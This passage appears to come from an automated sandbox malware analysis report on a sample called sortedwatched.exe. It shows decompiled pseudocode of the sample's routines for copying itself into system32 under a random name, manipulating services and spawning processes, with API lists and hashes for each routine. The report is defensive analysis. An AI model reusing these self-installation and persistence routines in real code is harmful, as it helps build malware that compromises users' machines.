                  • OpenServiceW.ADVAPI32(00000000,00000000,00010000), ref: 0040F77F
                  • DeleteService.ADVAPI32(00000000), ref: 0040F78C
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F793
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseDeleteFileHandleModuleNameOpenlstrlen
                  • String ID:
                  • API String ID: 1755434187-0
                  • Opcode ID: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction ID: 98483c91935e4ebaa86b3809d2fb255be3bc53819a93f085276952b5965563ee
                  • Opcode Fuzzy Hash: 8c6d03efe9b830c4f1bfd9f60f006d060f3a7d378c1f73d65c75a4cd1f519f25
                  • Instruction Fuzzy Hash: F4212B754012259ACB309F248C48AF77778DF44B56F40017BE985F7A90EB389E8AC79E
                  Uniqueness

                  Uniqueness Score: 1.01%

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                  				short _v524;
                  				WCHAR* _t34;
                  
                  				_t34 = 0;
                  				E00401000();
                  				if(E0040108B(0x416c50, 0x416840) == 0) {
                  					E00401503( &_v524, 0x104);
                  					GetTempPathW(0x104,  &_v524);
                  					GetTempFileNameW( &_v524, 0, 0,  &_v524);
                  					if(E0040108B(0x416840,  &_v524) != 0) {
                  						_t34 = E0040108B(0x416c50, 0x416840);
                  						_t38 = _t34;
                  						if(_t34 == 0) {
                  							E0040108B( &_v524, 0x416840);
                  						}
                  					}
                  				}
                  				E004010DC(_t38);
                  				return _t34;
                  			}






                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 130228747-3820085027
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00401000() {
                  				short _v524;
                  				signed int _t14;
                  				signed char _t16;
                  				struct _SECURITY_ATTRIBUTES* _t24;
                  				void* _t25;
                  
                  				E00401503( &_v524, 0x208);
                  				if( *0x416840 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t24 = 0;
                  				do {
                  					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
                  					_t24 =  &(_t24->nLength);
                  					 *(_t25 + _t24 - 0x20a) = _t14;
                  					if(_t14 != 0x5c) {
                  						goto L8;
                  					}
                  					_t16 = GetFileAttributesW( &_v524);
                  					if(_t16 != 0xffffffff) {
                  						if((_t16 & 0x00000010) == 0) {
                  							L6:
                  							return 0;
                  						}
                  						goto L8;
                  					}
                  					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
                  						goto L6;
                  					}
                  					L8:
                  				} while ( *(_t24 + 0x416840) != 0);
                  				goto L9;
                  			}









                  APIs
                  • GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 674977465-2966989349
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F883(WCHAR* __ecx) {
                  				short _t21;
                  				short _t24;
                  				short _t25;
                  				WCHAR* _t27;
                  				short _t30;
                  				signed int _t32;
                  				signed int _t33;
                  				signed int _t34;
                  				void* _t37;
                  
                  				_t27 = __ecx;
                  				lstrcpyW(__ecx, "C:\Windows\system32");
                  				_t32 = lstrlenW(_t27);
                  				_t21 = 0x5c;
                  				_t27[_t32] = _t21;
                  				_t33 = _t32 + 1;
                  				_t37 = (GetTickCount() & 0x0000000f) + 4;
                  				E00401E8F( &(_t27[_t33]), _t37);
                  				_t24 = 0x2e;
                  				_t34 = _t33 + _t37;
                  				_t30 = 0x65;
                  				_t27[_t34] = _t24;
                  				_t25 = 0x78;
                  				 *((short*)(_t27 + 2 + _t34 * 2)) = _t30;
                  				 *((short*)(_t27 + 4 + _t34 * 2)) = _t25;
                  				 *((short*)(_t27 + 6 + _t34 * 2)) = _t30;
                  				 *((short*)(_t27 + 8 + _t34 * 2)) = 0;
                  				return 0;
                  			}













                  APIs
                  • lstrcpyW.KERNEL32(?,C:\Windows\system32), ref: 0040F88E
                  • lstrlenW.KERNEL32(?), ref: 0040F895
                  • GetTickCount.KERNEL32 ref: 0040F8A5
                    • Part of subcall function 00401E8F: GetTickCount.KERNEL32(00000001,-00000004,?), ref: 00401EA4
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\system32
                  • API String ID: 1913473829-2896066436
                  • Opcode ID: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction ID: fa4d6f9086d2f062a8c468281c34a08385031fd9eafdca72e636224e2a785f14
                  • Opcode Fuzzy Hash: f29303cca2c36e1e583c5a6cd85068ee6764875e66978048a0fb2f6fbe9387fb
                  • Instruction Fuzzy Hash: C9F0F6236583056BD7205FE0EC89A563725DF44762F15D0B6EC09EF6A6EB74C841C3A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
                  				short _v524;
                  
                  				_t12 = E00401A52(0x412000, 0x7b38aa91);
                  				 *0x4143a4( &_v524, 0x104, _t3, "C:\Windows\system32\sortedwatched.exe");
                  				L00401B09(_t12);
                  				return DeleteFileW( &_v524);
                  			}





                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw
                  • API String ID: 366827715-662138423
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040284F(intOrPtr* __ecx) {
                  				char _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				void* _t89;
                  				void* _t90;
                  				signed int _t92;
                  				signed int _t93;
                  				signed int _t101;
                  				signed int _t126;
                  				int* _t128;
                  				char _t133;
                  				signed int _t135;
                  				signed int _t136;
                  				void* _t137;
                  				intOrPtr _t139;
                  				signed int _t141;
                  				void* _t142;
                  				signed int _t145;
                  				intOrPtr* _t148;
                  				signed int _t152;
                  				int _t153;
                  				intOrPtr _t154;
                  				int _t155;
                  				void* _t156;
                  
                  				_t148 = __ecx;
                  				_t142 = 8;
                  				if(__ecx == 0) {
                  					L22:
                  					_push(0xfffffffe);
                  					L23:
                  					_pop(_t89);
                  					return _t89;
                  				}
                  				_t128 =  *((intOrPtr*)(__ecx + 0x1c));
                  				if(_t128 == 0) {
                  					goto L22;
                  				}
                  				_t90 = 9;
                  				_t143 =  >  ? _t90 : _t142;
                  				_v20 =  *((intOrPtr*)(__ecx + 4));
                  				_t92 =  *(_t128 + 0x2af8);
                  				_v24 =  >  ? _t90 : _t142;
                  				 *(_t128 + 0x2af8) = 0;
                  				if( *(_t128 + 0xab04) >= 0) {
                  					 *(_t128 + 0x2afc) =  *(_t128 + 0x2afc) | 1;
                  					__eflags = _t92;
                  					if(_t92 == 0) {
                  						_t93 =  *(_t128 + 0x2af4);
                  						__eflags = _t93;
                  						if(_t93 == 0) {
                  							while(1) {
                  								_t131 =  *(_t128 + 0x2af0);
                  								_v8 =  *((intOrPtr*)(_t148 + 4));
                  								_v12 = 0x8000 -  *(_t128 + 0x2af0);
                  								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
                  								_t133 = _v8;
                  								 *(_t128 + 0xab04) = _t101;
                  								 *_t148 =  *_t148 + _t133;
                  								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
                  								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
                  								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  								_t135 = _v12;
                  								 *(_t128 + 0x2af4) = _t135;
                  								_t152 =  *(_t148 + 0x10);
                  								__eflags = _t135 - _t152;
                  								_v16 = _t101;
                  								_t153 =  <  ? _t135 : _t152;
                  								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
                  								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
                  								_t156 = _t156 + 0x20;
                  								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
                  								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
                  								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
                  								_t136 = _v16;
                  								_t145 =  *(_t128 + 0x2af4);
                  								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
                  								__eflags = _t136;
                  								if(_t136 < 0) {
                  									goto L3;
                  								}
                  								__eflags = _t136 - 1;
                  								if(_t136 != 1) {
                  									L18:
                  									__eflags = _t136;
                  									if(_t136 == 0) {
                  										__eflags = _t145;
                  										_t137 = 0xfffffffb;
                  										_t111 =  !=  ? _t137 : 1;
                  										return  !=  ? _t137 : 1;
                  									}
                  									__eflags =  *(_t148 + 0x10);
                  									if( *(_t148 + 0x10) == 0) {
                  										L8:
                  										_push(0xfffffffb);
                  										goto L23;
                  									}
                  									_t143 = _v24;
                  									continue;
                  								}
                  								__eflags = _v20;
                  								if(_v20 == 0) {
                  									goto L8;
                  								}
                  								goto L18;
                  							}
                  							goto L3;
                  						}
                  						_t154 =  *((intOrPtr*)(__ecx + 0x10));
                  						__eflags = _t93 - _t154;
                  						_t155 =  <  ? _t93 : _t154;
                  						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
                  						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
                  						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
                  						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
                  						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
                  						__eflags =  *(_t128 + 0xab04);
                  						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
                  						if( *(_t128 + 0xab04) != 0) {
                  							L14:
                  							return 0;
                  						}
                  						__eflags =  *(_t128 + 0x2af4);
                  						if( *(_t128 + 0x2af4) != 0) {
                  							goto L14;
                  						}
                  						return 1;
                  					}
                  					_v8 =  *((intOrPtr*)(__ecx + 4));
                  					_v12 =  *((intOrPtr*)(__ecx + 0x10));
                  					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
                  					_t139 = _v8;
                  					 *(_t128 + 0xab04) = _t126;
                  					 *__ecx =  *__ecx + _t139;
                  					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
                  					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
                  					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
                  					_t141 = _v12;
                  					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
                  					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
                  					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
                  					__eflags = _t126;
                  					if(__eflags < 0) {
                  						goto L3;
                  					}
                  					if(__eflags == 0) {
                  						return 1;
                  					}
                  					_t34 = _t128 + 0xab04;
                  					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
                  					__eflags =  *_t34;
                  					goto L8;
                  				}
                  				L3:
                  				_push(0xfffffffd);
                  				goto L23;
                  			}






























                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				void* _t28;
                  				void* _t44;
                  				void* _t45;
                  				intOrPtr _t46;
                  				signed int _t56;
                  				void* _t78;
                  				void* _t84;
                  				void* _t86;
                  				intOrPtr _t89;
                  				intOrPtr _t91;
                  				char* _t92;
                  				void* _t93;
                  
                  				_t46 = _a4;
                  				_v8 = __edx;
                  				E00401503(_t46, 0x808);
                  				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
                  				L00401B09(_t25);
                  				_t28 = E00401A52(0x4122a0, 0x680f9b3);
                  				_t3 = _t46 + 0x400; // 0x4065cd
                  				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
                  				L00401B09(_t28);
                  				_t80 = _v8;
                  				_t56 = 3;
                  				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
                  				_v8 = _t89;
                  				if(_t89 != 0) {
                  					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
                  					_t84 = (GetTickCount() & 0x0000000f) + 4;
                  					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
                  					_t91 = E004014F2(_t14 + _t84);
                  					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
                  					if(_t91 == 0) {
                  						_t85 = _v8;
                  					} else {
                  						E00401E27(_t91, _t84);
                  						_t92 = _t91 + _t84;
                  						_t85 = _v8;
                  						 *_t92 = 0x3d;
                  						_t93 = _t92 + 1;
                  						_t44 = E00401680(_v8, _a4, _t93);
                  						_t18 = _t46 + 0x800; // 0xc885c70e
                  						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
                  					}
                  					E00401532(_t85);
                  				}
                  				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
                  			}

















                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 23%
                  			E0040F7A0() {
                  				char _v8;
                  				char _v528;
                  				intOrPtr _t19;
                  				void* _t24;
                  				char _t32;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t32 = 0;
                  				_v8 = 0;
                  				_t24 =  *0x412ef4(0, 0, 0xf003f);
                  				if(_t24 != 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
                  					L00401B09(_t34);
                  					_t35 =  *0x4134c8(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
                  					if(_t35 != 0) {
                  						if(E0040F504(_t24,  &_v8) != 0) {
                  							 *0x41353c(_t35, 1, _v8);
                  							E00401532(_v8);
                  						}
                  					} else {
                  						_t35 =  *0x413594(_t24, 0x416530, 0x10);
                  					}
                  					if(_t35 != 0) {
                  						_t19 =  *0x41315c(_t35, _t32, _t32);
                  						_t32 = _t19;
                  						 *0x4135a4(_t35);
                  					}
                  					E0040F6D0(_t24);
                  					 *0x4135a4(_t24);
                  				}
                  				return _t32;
                  			}











                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 3988819677-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 44%
                  			E00401D2B(WCHAR* __edx, void* _a8, struct _PROCESS_INFORMATION* _a12) {
                  				WCHAR* _v8;
                  				struct _STARTUPINFOW _v76;
                  				intOrPtr _t19;
                  				int _t24;
                  				long _t33;
                  				void* _t34;
                  				int _t35;
                  
                  				_t33 = 0x44;
                  				_t35 = 0;
                  				_v8 = 0;
                  				E00401503( &_v76, _t33);
                  				_v76.cb = _t33;
                  				_t34 = _a8;
                  				if(_t34 == 0) {
                  					_t35 = CreateProcessW(0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
                  				} else {
                  					_t19 = E00401A52(0x412090, 0xdb2fc54);
                  					_push(0);
                  					_v76.lpDesktop = _t19;
                  					_push(_t34);
                  					_push( &_v8);
                  					if( *0x4154a0() != 0) {
                  						_t24 = CreateProcessAsUserW(_t34, 0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
                  						_t35 = _t24;
                  						 *0x415564(_v8);
                  					}
                  					L00401B09(_v76.lpDesktop);
                  				}
                  				return _t35;
                  			}











                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401DBA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID: M vu
                  • API String ID: 4042571897-696074975
                  • Opcode ID: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction ID: 8fb0d45fc8d51ab0f5bd0c7e4b9a4df30b4027125393a8a12e18b04e3b77fe86
                  • Opcode Fuzzy Hash: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction Fuzzy Hash: 64115E71A01228BBCB219B968C48DDFBFBDEF85764B144027F609A3250D6745D02C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040FC67() {
                  				void* _t9;
                  				int _t10;
                  				void* _t15;
                  				intOrPtr* _t21;
                  				intOrPtr* _t22;
                  
                  				_t22 =  *0x4164e4;
                  				_t21 = 0x4164e4;
                  				if(_t22 == 0) {
                  					return _t9;
                  				}
                  				do {
                  					_t15 = 0;
                  					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
                  						_t15 = 1;
                  					}
                  					if( *((intOrPtr*)(_t22 + 8)) == 3) {
                  						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
                  						if(_t10 == 0) {
                  							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
                  							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
                  							_t10 = CloseHandle( *(_t22 + 0x14));
                  							_t15 = 1;
                  						}
                  					}
                  					if(_t15 == 0) {
                  						_t21 = _t22;
                  					} else {
                  						 *_t21 =  *_t22;
                  						_t10 = E00401532(_t22);
                  					}
                  					_t22 =  *_t21;
                  				} while (_t22 != 0);
                  				return _t10;
                  			}









                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
                  				intOrPtr _v18;
                  				struct _SHFILEOPSTRUCTW _v36;
                  				int _t12;
                  				intOrPtr _t15;
                  				intOrPtr _t18;
                  				intOrPtr _t19;
                  
                  				_t18 = __edx;
                  				_t19 = __ecx;
                  				memset( &_v36, 0, 0x1e);
                  				_v36.pFrom = _t19;
                  				_v36.pTo = _t18;
                  				_v36.fFlags = 0xe14;
                  				_t15 = 1;
                  				_v36.wFunc = 1;
                  				_t12 = SHFileOperationW( &_v36);
                  				if(_t12 != 0 || _v18 != _t12) {
                  					_t15 = 0;
                  				}
                  				return _t15;
                  			}










                  APIs
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 00401091
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 1721435463-2966989349
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t11;
                  
                  				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t11 = CreateEventW(0, 0, 0,  &_v132);
                  				 *0x414e6c = _t11;
                  				return 0 | _t11 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F292() {
                  				void* _t3;
                  				void* _t7;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
